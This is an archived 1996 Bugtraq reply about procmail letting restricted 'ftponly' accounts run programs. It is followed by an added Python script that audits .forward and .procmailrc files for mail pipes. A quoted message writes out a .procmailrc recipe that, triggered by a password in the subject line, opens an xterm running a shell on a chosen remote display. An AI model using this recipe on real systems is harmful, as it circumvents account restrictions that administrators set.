[3079] in bugtraq
Re: procmail
daemon@ATHENA.MIT.EDU (Kari E. Hurtta)
Wed Aug 7 16:48:12 1996
Date: Wed, 7 Aug 1996 08:47:26 +0300
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "Kari E. Hurtta" <Kari.Hurtta@dionysos.fmi.fi>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199608062130.WAA25867@server2.mersinet.co.uk> from Neil
Soveran-Charley at "Aug 6, 96 10:30:46 pm"
Neil Soveran-Charley writes:
> > hi there ,
> > I just heard from a friend that there is a bug in procmail
> > which allows anyone to open an xterm window from any
> > m/c. Has anyone heard of this? If so, can u post the details
> > and the xploit
> > thanx
> > danny
> >
>
> NB: This isn't a 'hack an account' hole. However if you have
> 'ftponly' accounts, i.e. people grab email via pop, but also have ftp
> access for maintaining their web pages, with a 'shell' that prints a
> message and exits, then the following is possible to work around such
> security...
>
> I think there may well be such an exploit. I'd guess it is simply
> something like:
>
> (.procmailrc contents)
>
> :0 Hc
> * ^Subject:.*APassword
> /usr/bin/X11/xterm -display <some display> -e <a shell>
>
> (end .procmailrc)
>
> Then email yourself with something with the password in the subject
> line and an xterm gets popped up on the display, running the given
> shell, thus bypassing any 'locked account' or 'ftponly' shells...
>
> I'm sure procmail MUST have some security feature to disallow this
> sort of thing? But I could be wrong, and haven't checked the manual
> pages yet.
Sendmail disallows this sort of thing by not allowing pipes in .forward
if the user does not have a valid shell (listed in /etc/shells). Yes, if you
use procmail as the local delivery agent, then you need the same kind of
mechanism in procmail also (if it allows piping mail to programs).
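
An added example, not part of the original messages: a Python audit that applies the /etc/shells test described in the reply to both .forward and .procmailrc, listing accounts whose shell is not in /etc/shells but whose files pipe mail to a program. The passwd, shells and dotfile contents are constructed sample data, and the function names are hypothetical.

```python
import re

# Constructed sample data (not from the original post).
PASSWD = ("alice:x:1001:100::/home/alice:/bin/bash\n"
          "webftp:x:1002:100::/home/webftp:/usr/local/bin/ftponly\n")
SHELLS = "# valid login shells\n/bin/sh\n/bin/bash\n"
FILES = {
    "/home/alice/.procmailrc": ":0\n* ^Subject:.*report\n| /some/filter\n",
    "/home/webftp/.procmailrc": ":0 c\n* ^Subject:.*x\n| /some/program\n",
    "/home/webftp/.forward": '\\webftp, "|/some/program"\n',
}
PIPE = re.compile(r'\s*"?\|')  # matches |cmd or "|cmd" at the start of an entry

def valid_shells(shells_text):
    """Shells listed in /etc/shells, ignoring blank lines and comments."""
    lines = (l.strip() for l in shells_text.splitlines())
    return {l for l in lines if l and not l.startswith("#")}

def restricted_users(passwd_text, shells):
    """Yield (user, home) for accounts whose shell is not a listed shell."""
    for line in passwd_text.splitlines():
        f = line.split(":")
        # An empty shell field in passwd means /bin/sh.
        if len(f) == 7 and (f[6] or "/bin/sh") not in shells:
            yield f[0], f[5]

def program_lines(name, text):
    """Lines that hand mail to a program through a '|' entry.
    Only the pipe mechanism named in the message is checked."""
    hits = []
    for line in text.splitlines():
        # .forward can hold several comma-separated targets per line.
        entries = line.split(",") if name == ".forward" else [line]
        if any(PIPE.match(e) for e in entries):
            hits.append(line.strip())
    return hits

def audit(passwd_text, shells_text, read_file):
    """Return [(user, path, line)] for restricted accounts piping mail to programs."""
    findings = []
    for user, home in restricted_users(passwd_text, valid_shells(shells_text)):
        for name in (".forward", ".procmailrc"):
            path = f"{home}/{name}"
            for line in program_lines(name, read_file(path) or ""):
                findings.append((user, path, line))
    return findings

if __name__ == "__main__":
    for finding in audit(PASSWD, SHELLS, FILES.get):
        print(*finding, sep="\t")
```

On a live system, `read_file` would be a function that returns the file's text or `None` when the file is missing or unreadable.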